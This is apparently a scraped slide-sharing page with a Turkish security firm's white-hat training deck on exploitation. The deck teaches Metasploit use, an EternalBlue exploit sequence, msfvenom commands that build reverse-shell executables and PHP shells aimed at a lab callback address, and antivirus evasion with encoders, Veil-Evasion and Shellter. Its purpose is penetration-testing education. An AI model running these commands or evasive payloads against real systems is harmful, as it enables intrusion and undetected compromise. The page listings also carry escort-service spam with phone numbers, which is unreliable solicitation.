Beyaz Şapkalı Hacker CEH Eğitimi - Exploit AşamasıPRISMA CSI
 
Beyaz Şapkalı Hacker CEH Eğitimi - Aktif Bilgi Toplama
Beyaz Şapkalı Hacker CEH Eğitimi - Aktif Bilgi ToplamaBeyaz Şapkalı Hacker CEH Eğitimi - Aktif Bilgi Toplama
Beyaz Şapkalı Hacker CEH Eğitimi - Aktif Bilgi ToplamaPRISMA CSI
 
Beyaz Şapkalı Hacker CEH Eğitimi - Siber Güvenlik Temelleri
Beyaz Şapkalı Hacker CEH Eğitimi - Siber Güvenlik TemelleriBeyaz Şapkalı Hacker CEH Eğitimi - Siber Güvenlik Temelleri
Beyaz Şapkalı Hacker CEH Eğitimi - Siber Güvenlik TemelleriPRISMA CSI
 
Beyaz Şapkalı Hacker CEH Eğitimi - Pasif Bilgi Toplama (OSINT)
Beyaz Şapkalı Hacker CEH Eğitimi - Pasif Bilgi Toplama (OSINT)Beyaz Şapkalı Hacker CEH Eğitimi - Pasif Bilgi Toplama (OSINT)
Beyaz Şapkalı Hacker CEH Eğitimi - Pasif Bilgi Toplama (OSINT)PRISMA CSI
 
Kaynak Kod Analiz Süreci
Kaynak Kod Analiz SüreciKaynak Kod Analiz Süreci
Kaynak Kod Analiz SüreciPRISMA CSI
 

More from PRISMA CSI (12)

Sysmon ile Log Toplama
Sysmon ile Log ToplamaSysmon ile Log Toplama
Sysmon ile Log Toplama
 
Practical White Hat Hacker Training - Passive Information Gathering(OSINT)
Practical White Hat Hacker Training - Passive Information Gathering(OSINT)Practical White Hat Hacker Training - Passive Information Gathering(OSINT)
Practical White Hat Hacker Training - Passive Information Gathering(OSINT)
 
Beyaz Şapkalı Hacker CEH Eğitimi - Parola Kırma Saldırıları
Beyaz Şapkalı Hacker CEH Eğitimi - Parola Kırma SaldırılarıBeyaz Şapkalı Hacker CEH Eğitimi - Parola Kırma Saldırıları
Beyaz Şapkalı Hacker CEH Eğitimi - Parola Kırma Saldırıları
 
Sızma Testi Metodolojileri
Sızma Testi MetodolojileriSızma Testi Metodolojileri
Sızma Testi Metodolojileri
 
Sızma (Penetrasyon) Testi Nedir?
Sızma (Penetrasyon) Testi Nedir?Sızma (Penetrasyon) Testi Nedir?
Sızma (Penetrasyon) Testi Nedir?
 
Beyaz Şapkalı Hacker CEH Eğitimi - Post Exploit Aşaması
Beyaz Şapkalı Hacker CEH Eğitimi - Post Exploit AşamasıBeyaz Şapkalı Hacker CEH Eğitimi - Post Exploit Aşaması
Beyaz Şapkalı Hacker CEH Eğitimi - Post Exploit Aşaması
 
Beyaz Şapkalı Hacker CEH Eğitimi - Zafiyet Keşfi
Beyaz Şapkalı Hacker CEH Eğitimi - Zafiyet KeşfiBeyaz Şapkalı Hacker CEH Eğitimi - Zafiyet Keşfi
Beyaz Şapkalı Hacker CEH Eğitimi - Zafiyet Keşfi
 
Beyaz Şapkalı Hacker CEH Eğitimi - Exploit Aşaması
Beyaz Şapkalı Hacker CEH Eğitimi - Exploit AşamasıBeyaz Şapkalı Hacker CEH Eğitimi - Exploit Aşaması
Beyaz Şapkalı Hacker CEH Eğitimi - Exploit Aşaması
 
Beyaz Şapkalı Hacker CEH Eğitimi - Aktif Bilgi Toplama
Beyaz Şapkalı Hacker CEH Eğitimi - Aktif Bilgi ToplamaBeyaz Şapkalı Hacker CEH Eğitimi - Aktif Bilgi Toplama
Beyaz Şapkalı Hacker CEH Eğitimi - Aktif Bilgi Toplama
 
Beyaz Şapkalı Hacker CEH Eğitimi - Siber Güvenlik Temelleri
Beyaz Şapkalı Hacker CEH Eğitimi - Siber Güvenlik TemelleriBeyaz Şapkalı Hacker CEH Eğitimi - Siber Güvenlik Temelleri
Beyaz Şapkalı Hacker CEH Eğitimi - Siber Güvenlik Temelleri
 
Beyaz Şapkalı Hacker CEH Eğitimi - Pasif Bilgi Toplama (OSINT)
Beyaz Şapkalı Hacker CEH Eğitimi - Pasif Bilgi Toplama (OSINT)Beyaz Şapkalı Hacker CEH Eğitimi - Pasif Bilgi Toplama (OSINT)
Beyaz Şapkalı Hacker CEH Eğitimi - Pasif Bilgi Toplama (OSINT)
 
Kaynak Kod Analiz Süreci
Kaynak Kod Analiz SüreciKaynak Kod Analiz Süreci
Kaynak Kod Analiz Süreci
 

Recently uploaded

Organic Name Reactions for the students and aspirants of Chemistry12th.pptx
Organic Name Reactions for the students and aspirants of Chemistry12th.pptxOrganic Name Reactions for the students and aspirants of Chemistry12th.pptx
Organic Name Reactions for the students and aspirants of Chemistry12th.pptxVS Mahajan Coaching Centre
 
ECONOMIC CONTEXT - LONG FORM TV DRAMA - PPT
ECONOMIC CONTEXT - LONG FORM TV DRAMA - PPTECONOMIC CONTEXT - LONG FORM TV DRAMA - PPT
ECONOMIC CONTEXT - LONG FORM TV DRAMA - PPTiammrhaywood
 
How to Make a Pirate ship Primary Education.pptx
How to Make a Pirate ship Primary Education.pptxHow to Make a Pirate ship Primary Education.pptx
How to Make a Pirate ship Primary Education.pptxmanuelaromero2013
 
KSHARA STURA .pptx---KSHARA KARMA THERAPY (CAUSTIC THERAPY)————IMP.OF KSHARA ...
KSHARA STURA .pptx---KSHARA KARMA THERAPY (CAUSTIC THERAPY)————IMP.OF KSHARA ...KSHARA STURA .pptx---KSHARA KARMA THERAPY (CAUSTIC THERAPY)————IMP.OF KSHARA ...
KSHARA STURA .pptx---KSHARA KARMA THERAPY (CAUSTIC THERAPY)————IMP.OF KSHARA ...M56BOOKSTORE PRODUCT/SERVICE
 
Alper Gobel In Media Res Media Component
Alper Gobel In Media Res Media ComponentAlper Gobel In Media Res Media Component
Alper Gobel In Media Res Media ComponentInMediaRes1
 
The basics of sentences session 2pptx copy.pptx
The basics of sentences session 2pptx copy.pptxThe basics of sentences session 2pptx copy.pptx
The basics of sentences session 2pptx copy.pptxheathfieldcps1
 
Call Girls in Dwarka Mor Delhi Contact Us 9654467111
Call Girls in Dwarka Mor Delhi Contact Us 9654467111Call Girls in Dwarka Mor Delhi Contact Us 9654467111
Call Girls in Dwarka Mor Delhi Contact Us 9654467111Sapana Sha
 
The Most Excellent Way | 1 Corinthians 13
The Most Excellent Way | 1 Corinthians 13The Most Excellent Way | 1 Corinthians 13
The Most Excellent Way | 1 Corinthians 13Steve Thomason
 
Sanyam Choudhary Chemistry practical.pdf
Sanyam Choudhary Chemistry practical.pdfSanyam Choudhary Chemistry practical.pdf
Sanyam Choudhary Chemistry practical.pdfsanyamsingh5019
 
Enzyme, Pharmaceutical Aids, Miscellaneous Last Part of Chapter no 5th.pdf
Enzyme, Pharmaceutical Aids, Miscellaneous Last Part of Chapter no 5th.pdfEnzyme, Pharmaceutical Aids, Miscellaneous Last Part of Chapter no 5th.pdf
Enzyme, Pharmaceutical Aids, Miscellaneous Last Part of Chapter no 5th.pdfSumit Tiwari
 
Hybridoma Technology ( Production , Purification , and Application )
Hybridoma Technology ( Production , Purification , and Application ) Hybridoma Technology ( Production , Purification , and Application )
Hybridoma Technology ( Production , Purification , and Application ) Sakshi Ghasle
 
BASLIQ CURRENT LOOKBOOK LOOKBOOK(1) (1).pdf
BASLIQ CURRENT LOOKBOOK LOOKBOOK(1) (1).pdfBASLIQ CURRENT LOOKBOOK LOOKBOOK(1) (1).pdf
BASLIQ CURRENT LOOKBOOK LOOKBOOK(1) (1).pdfSoniaTolstoy
 
Employee wellbeing at the workplace.pptx
Employee wellbeing at the workplace.pptxEmployee wellbeing at the workplace.pptx
Employee wellbeing at the workplace.pptxNirmalaLoungPoorunde1
 
Incoming and Outgoing Shipments in 1 STEP Using Odoo 17
Incoming and Outgoing Shipments in 1 STEP Using Odoo 17Incoming and Outgoing Shipments in 1 STEP Using Odoo 17
Incoming and Outgoing Shipments in 1 STEP Using Odoo 17Celine George
 
microwave assisted reaction. General introduction
microwave assisted reaction. General introductionmicrowave assisted reaction. General introduction
microwave assisted reaction. General introductionMaksud Ahmed
 

Recently uploaded (20)

Organic Name Reactions for the students and aspirants of Chemistry12th.pptx
Organic Name Reactions for the students and aspirants of Chemistry12th.pptxOrganic Name Reactions for the students and aspirants of Chemistry12th.pptx
Organic Name Reactions for the students and aspirants of Chemistry12th.pptx
 
TataKelola dan KamSiber Kecerdasan Buatan v022.pdf
TataKelola dan KamSiber Kecerdasan Buatan v022.pdfTataKelola dan KamSiber Kecerdasan Buatan v022.pdf
TataKelola dan KamSiber Kecerdasan Buatan v022.pdf
 
ECONOMIC CONTEXT - LONG FORM TV DRAMA - PPT
ECONOMIC CONTEXT - LONG FORM TV DRAMA - PPTECONOMIC CONTEXT - LONG FORM TV DRAMA - PPT
ECONOMIC CONTEXT - LONG FORM TV DRAMA - PPT
 
How to Make a Pirate ship Primary Education.pptx
How to Make a Pirate ship Primary Education.pptxHow to Make a Pirate ship Primary Education.pptx
How to Make a Pirate ship Primary Education.pptx
 
KSHARA STURA .pptx---KSHARA KARMA THERAPY (CAUSTIC THERAPY)————IMP.OF KSHARA ...
KSHARA STURA .pptx---KSHARA KARMA THERAPY (CAUSTIC THERAPY)————IMP.OF KSHARA ...KSHARA STURA .pptx---KSHARA KARMA THERAPY (CAUSTIC THERAPY)————IMP.OF KSHARA ...
KSHARA STURA .pptx---KSHARA KARMA THERAPY (CAUSTIC THERAPY)————IMP.OF KSHARA ...
 
Alper Gobel In Media Res Media Component
Alper Gobel In Media Res Media ComponentAlper Gobel In Media Res Media Component
Alper Gobel In Media Res Media Component
 
The basics of sentences session 2pptx copy.pptx
The basics of sentences session 2pptx copy.pptxThe basics of sentences session 2pptx copy.pptx
The basics of sentences session 2pptx copy.pptx
 
Model Call Girl in Tilak Nagar Delhi reach out to us at 🔝9953056974🔝
Model Call Girl in Tilak Nagar Delhi reach out to us at 🔝9953056974🔝Model Call Girl in Tilak Nagar Delhi reach out to us at 🔝9953056974🔝
Model Call Girl in Tilak Nagar Delhi reach out to us at 🔝9953056974🔝
 
Call Girls in Dwarka Mor Delhi Contact Us 9654467111
Call Girls in Dwarka Mor Delhi Contact Us 9654467111Call Girls in Dwarka Mor Delhi Contact Us 9654467111
Call Girls in Dwarka Mor Delhi Contact Us 9654467111
 
The Most Excellent Way | 1 Corinthians 13
The Most Excellent Way | 1 Corinthians 13The Most Excellent Way | 1 Corinthians 13
The Most Excellent Way | 1 Corinthians 13
 
Código Creativo y Arte de Software | Unidad 1
Código Creativo y Arte de Software | Unidad 1Código Creativo y Arte de Software | Unidad 1
Código Creativo y Arte de Software | Unidad 1
 
Sanyam Choudhary Chemistry practical.pdf
Sanyam Choudhary Chemistry practical.pdfSanyam Choudhary Chemistry practical.pdf
Sanyam Choudhary Chemistry practical.pdf
 
Enzyme, Pharmaceutical Aids, Miscellaneous Last Part of Chapter no 5th.pdf
Enzyme, Pharmaceutical Aids, Miscellaneous Last Part of Chapter no 5th.pdfEnzyme, Pharmaceutical Aids, Miscellaneous Last Part of Chapter no 5th.pdf
Enzyme, Pharmaceutical Aids, Miscellaneous Last Part of Chapter no 5th.pdf
 
Hybridoma Technology ( Production , Purification , and Application )
Hybridoma Technology ( Production , Purification , and Application ) Hybridoma Technology ( Production , Purification , and Application )
Hybridoma Technology ( Production , Purification , and Application )
 
BASLIQ CURRENT LOOKBOOK LOOKBOOK(1) (1).pdf
BASLIQ CURRENT LOOKBOOK LOOKBOOK(1) (1).pdfBASLIQ CURRENT LOOKBOOK LOOKBOOK(1) (1).pdf
BASLIQ CURRENT LOOKBOOK LOOKBOOK(1) (1).pdf
 
Employee wellbeing at the workplace.pptx
Employee wellbeing at the workplace.pptxEmployee wellbeing at the workplace.pptx
Employee wellbeing at the workplace.pptx
 
Incoming and Outgoing Shipments in 1 STEP Using Odoo 17
Incoming and Outgoing Shipments in 1 STEP Using Odoo 17Incoming and Outgoing Shipments in 1 STEP Using Odoo 17
Incoming and Outgoing Shipments in 1 STEP Using Odoo 17
 
Staff of Color (SOC) Retention Efforts DDSD
Staff of Color (SOC) Retention Efforts DDSDStaff of Color (SOC) Retention Efforts DDSD
Staff of Color (SOC) Retention Efforts DDSD
 
microwave assisted reaction. General introduction
microwave assisted reaction. General introductionmicrowave assisted reaction. General introduction
microwave assisted reaction. General introduction
 
Model Call Girl in Bikash Puri Delhi reach out to us at 🔝9953056974🔝
Model Call Girl in Bikash Puri Delhi reach out to us at 🔝9953056974🔝Model Call Girl in Bikash Puri Delhi reach out to us at 🔝9953056974🔝
Model Call Girl in Bikash Puri Delhi reach out to us at 🔝9953056974🔝
 

Practical White Hat Hacker Training - Exploitation

  • 1. www.prismacsi.com © All Rights Reserved. 1 Practical White Hat Hacker Training #5 Exploitation This document may be quoted or shared, but cannot be modified or used for commercial purposes. For more information, visit https://creativecommons.org/licenses/by-nc-nd/4.0/legalcode.tr
  • 2. www.prismacsi.com © All Rights Reserved. 2 Exploit Stage Topics • What is an exploit? • Types of exploits • Local, remote and 0day exploits • Exploit Databases • Example Exploit Scenarios • Exploit Execution and Usage Scenarios • Exploit Frameworks • Payload Concept • Metasploit Framework • Antivirus Evasion Software • Veil-Evasion • Shellter • Application
  • 3. www.prismacsi.com © All Rights Reserved. 3 Basic Concepts • What’s an exploit? • The name given to tools developed to exploit a vulnerability. • Also called exploitation code. • Local Exploit • Remote Exploit • Web Exploit • DoS Exploit • 0day Exploit • What’s a Payload? • A piece of malicious code that performs a given desired action after an exploit
  • 4. www.prismacsi.com © All Rights Reserved. 4 Exploit Databases • A holding container for a massive number of exploits. Discovered/detected software and service exploits can be searched for in these databases. • Exploit-db.com • Securityfocus.com • 0day.today • Exploits.shodan.io • Iedb.ir • Cxsecurity.com/exploit • Rapid7.com/db
  • 5. www.prismacsi.com © All Rights Reserved. 5 Exploit Development Languages • In which programming languages are exploits generally written? • Python • C / C++ • Perl • PHP • Ruby • Why was the Framework concept conceived? • Metasploit Framework example
  • 6. www.prismacsi.com © All Rights Reserved. 6 Exploit Execution / Use– Demo
  • 7. www.prismacsi.com © All Rights Reserved. 7 Exploit Editing • Exploits don’t execute on every system. • Parameters may vary according to features such as operating system, processor architecture, system language. • In this case you may need to edit the exploit and then execute it afterwards. • Replicas of target system can be created in a laboratory environment for experiments. • Assume you only have one chance to attack! • A system crash may be the end of everything.
  • 8. www.prismacsi.com © All Rights Reserved. 8 Exploit Example - Scenario • Consider a bank’s credit calculation area! • Where is the calculation performed? ( Server? Client? ) • What if we perform the request specified in the scenario thousands of times within a minute? • This is an example of a simple DoS ExploitJ
  • 9. www.prismacsi.com © All Rights Reserved. 9 Exploit Frameworks • Metasploit Community • Metasploit Pro • Core Impact • Exploithub • BeEF
  • 10. www.prismacsi.com © All Rights Reserved. 10 Metasploit Framework • Metasploit Framework • Installation • Basic Commands • Auxiliary modules • Exploit use • Payload listi and Meterpreter use • Output analysis • Post Exploitation
  • 11. www.prismacsi.com © All Rights Reserved. 11 Metasploit Framework • It’s an open source software. • Pro version is available but the community version will be sufficient for this course . • Exploits • Payloads • Auxiliary modules • Encoders • Post exploits
  • 12. www.prismacsi.com © All Rights Reserved. 12 Metasploit Framework • Visit the link below for installation instructions: • https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers • Update: • msfupdate
  • 13. www.prismacsi.com © All Rights Reserved. 13 Metasploit Framework
  • 14. www.prismacsi.com © All Rights Reserved. 14 Metasploit Framework • Start • Begin by typing msfconsole in the command line. • You can check the database status with the following command: • db_status
  • 15. www.prismacsi.com © All Rights Reserved. 15 Metasploit Framework • Workspace concept • Use the workspace to list all the available workspaces. • workspace -a prisma creates a prisma workspace. • workspace prisma Switch to prisma workspace. • workspace -d prisma delete the prisma workspace.
  • 16. www.prismacsi.com © All Rights Reserved. 16 Metasploit Framework
  • 17. www.prismacsi.com © All Rights Reserved. 17 Metasploit Framework • Working with Nessus, Nmap outputs You can use the output of scanning software in integration with metasploit. This is one of the best features of the Metasploit Framework. • db_import nmap.xml import nmap output. • db_import nessus-report.nessus import nessus output. • db_export -f xml /tmp/prisma.xml export the data in your workspace.
  • 18. www.prismacsi.com © All Rights Reserved. 18 Metasploit Framework
  • 19. www.prismacsi.com © All Rights Reserved. 19 Metasploit Framework
  • 20. www.prismacsi.com © All Rights Reserved. 20 Metasploit Framework • Workspace data : • hosts • services • creds • loots
  • 21. www.prismacsi.com © All Rights Reserved. 21 Metasploit Framework • Hosts command • Db_nmap –sS –Pn –n 10.0.1.0/24 You can perform nmap scans with the command. host command can be used to view all IP addresses discovered from the output of this command. • hosts –h You can access all the command functions with the above command • hosts –R Used to add addresses to the RHOST parameter.
  • 22. www.prismacsi.com © All Rights Reserved. 22 Metasploit Framework
  • 23. www.prismacsi.com © All Rights Reserved. 23 Metasploit Framework • Services command • db_nmap –sS –Pn –n 10.0.1.0/24 –sV Used to execute an nmap scan. After the output of this command, you can view the ports on all IP addresses and the services running on them with the services command. • services –h . You can access all the services command functions with the above command • services –p 445 • services –S http • services –p 80 -R
  • 24. www.prismacsi.com © All Rights Reserved. 24 Metasploit Framework
  • 25. www.prismacsi.com © All Rights Reserved. 25 Metasploit Basic Command List • help • Help command • banner • Allows you to take awesome screenshotsJ • info • Get information on any plugin • info exploit/windows/smb/psexec • search • Search command • search ms17-010
  • 26. www.prismacsi.com © All Rights Reserved. 26 Metasploit Basic Command List • use • Select an exploit • use exploit/windows/smb/psexec • set • Exploit • info • Acquire information on any plugin • info exploit/windows/smb/psexec • search • Search command • search ms17-010
  • 27. www.prismacsi.com © All Rights Reserved. 27 Metasploit Framework - Help
  • 28. www.prismacsi.com © All Rights Reserved. 28 Metasploit Framework - Banner
  • 29. www.prismacsi.com © All Rights Reserved. 29 Metasploit Framework - Info
  • 30. www.prismacsi.com © All Rights Reserved. 30 Metasploit Basic Command List • set • Used to assign values to a parameter. • set RHOST 10.0.1.5 • setg • Used to assign a parameter value as global. • unset • Used to reset parameter values. • show • Show namesJ • use • Activates a plugin.
  • 31. www.prismacsi.com © All Rights Reserved. 31 Metasploit Basic Command List • run and exploit • Used to run a plugin. • load and unload • Used to activate or deactivate a module. • exit • Exiting command
  • 32. www.prismacsi.com © All Rights Reserved. 32 Metasploit Show Command • show payloads • List Payloads • show targets • List operating systems suitable for attacks with a given plugin • show options • Show setting parameters for a plugin • show encoders • List all encoders
  • 33. www.prismacsi.com © All Rights Reserved. 33 Auxillary Modules and Use • show auxillary • search smb_login • use auxillary/dos/windows/rdp/ms12_020 • set RHOST • set RPORT • run
  • 34. www.prismacsi.com © All Rights Reserved. 34 Exploit Attempt (MS17-010) • search netapi • info exploit/windows/smb/ms17_010_eternalblue • use exploit/windows/smb/ms17_010_eternalblue • show options • set payload windows/meterpreter/bind_tcp • set LHOST, • set RHOST • set RPORT • exploit
  • 35. www.prismacsi.com © All Rights Reserved. 35 Payload Examples • set PAYLOAD windows/meterpreter/reverse_http • set PAYLOAD windows/shell/bind_tcp • set PAYLOAD linux/x86/meterpreter/reverse_https • set PAYLOAD php/meterpreter/bind_tcp • set PAYLOAD java/meterpreter/bind_tcp • set PAYLOAD /windows/vncinject/reverse_tcp
  • 36. www.prismacsi.com © All Rights Reserved. 36 Reverse/Bind Shell
  • 37. www.prismacsi.com © All Rights Reserved. 37 Session Management • exploit/multi/handler • Can be used as a listener. • Listener can be run as a job to get connections from multiple targets. • jobs : • exploit –j • jobs command is used for listing jobs.
  • 38. www.prismacsi.com © All Rights Reserved. 38 Session Management • You can manage all sessions obtained with the sessions command. • sessions –l : list sessions • session –i 1 : 1. Interact with session • sessions –K : end all sessions • sessions –u : upgrade a session to meterpreter session • kill : used to kill a session. • background : takes the session into the background and returns to the metasploit console.
  • 39. www.prismacsi.com © All Rights Reserved. 39 Exploit Search • Searchsploit
  • 40. www.prismacsi.com © All Rights Reserved. 40 What’s Msfvenom? • There may be no direct vulnerability in the target system. • In this case, it may be necessary to try to penetrate the system in different ways. • For example if a created malicious .exe file is somehow successfully uploaded and executed on a system then the system can be captured. • Or you might want to upload a malicious shell written in php on to a web application with a file upload vulnerability and get a terminal connection on metasploit. • That's where msfvenom comes into play!
  • 41. www.prismacsi.com © All Rights Reserved. 41 Msfvenom Use • Msfvenom basic commands • msfvenom -h • msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.10.10 lport=1337-f exe > shell.exe • msfvenom -p php/meterpreter/reverse_tcp lhost=172.16.10.10. lport=4444 -f raw > exp.php • msfvenom - p windows/meterpreter/reverse_tcp lhost=172.16.10.10 lport=4444 -f war -a x86
  • 42. www.prismacsi.com © All Rights Reserved. 42 Msfvenom AV Evasion- Demonstration • msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.10.10 lport=1337 -e x86/shikata_ga_nai -i 15 -f exe -o shell.exe
  • 43. www.prismacsi.com © All Rights Reserved. 43 Msfvenom Help
  • 44. www.prismacsi.com © All Rights Reserved. 44 Msfvenom PHP Payload Contents
  • 45. www.prismacsi.com © All Rights Reserved. 45 Download Metasploit Additional Plugins • https://github.com/darkoperator/Metasploit-Plugins
  • 46. www.prismacsi.com © All Rights Reserved. 46 Loading Metasploit Features • Files are added manually under ~/.msf4/plugin/
  • 47. www.prismacsi.com © All Rights Reserved. 47 Armitage Use • Metasploit Framework GUI • Used to perform actions quickly • The interface is a little easier to use compared to the console application
  • 48. www.prismacsi.com © All Rights Reserved. 48 Armitage Use • Adding a host
  • 49. www.prismacsi.com © All Rights Reserved. 49 Armitage Use • Host scanning
  • 50. www.prismacsi.com © All Rights Reserved. 50 Armitage Use • Scan Results
  • 51. www.prismacsi.com © All Rights Reserved. 51 Armitage Use • Finding an attack vector
  • 52. www.prismacsi.com © All Rights Reserved. 52 Armitage Use • Java_rmi_attack
  • 53. www.prismacsi.com © All Rights Reserved. 53 Armitage Use • Java_rmi_attack • Meterpreter session
  • 54. www.prismacsi.com © All Rights Reserved. 54 Antivirus Evasion Tools • An antivirus mechanism may be found in target systems. • In this case the attacks should be performed with much more caution. • There are tools developed to bypass antiviruses. • Used tools • Veil-Evasion • Shellter • Av0id • Msfvenom
  • 55. www.prismacsi.com © All Rights Reserved. 55 Veil-Evasion Installation
  • 56. www.prismacsi.com © All Rights Reserved. 56 Veil-Evasion Payload Selection
  • 57. www.prismacsi.com © All Rights Reserved. 57 Veil-Evasion Payload Configuration
  • 58. www.prismacsi.com © All Rights Reserved. 58 Veil-Evasion Payload Creation - DEMO
  • 59. www.prismacsi.com © All Rights Reserved. 59 Virustotal Scanning
  • 60. www.prismacsi.com © All Rights Reserved. 60 Shellter Installation
  • 61. www.prismacsi.com © All Rights Reserved. 61 Shellter Use – DEMO
  • 62. www.prismacsi.com © All Rights Reserved. 62 Virustotal Scanning
  • 63. www.prismacsi.com © All Rights Reserved. 63 Applications
  • 64. www.prismacsi.com © All Rights Reserved. 64 Questions?
  • 65. www.prismacsi.com © All Rights Reserved. 65 www.prismacsi.com info@prismacsi.com 0 850 303 85 35 /prismacsi Contacts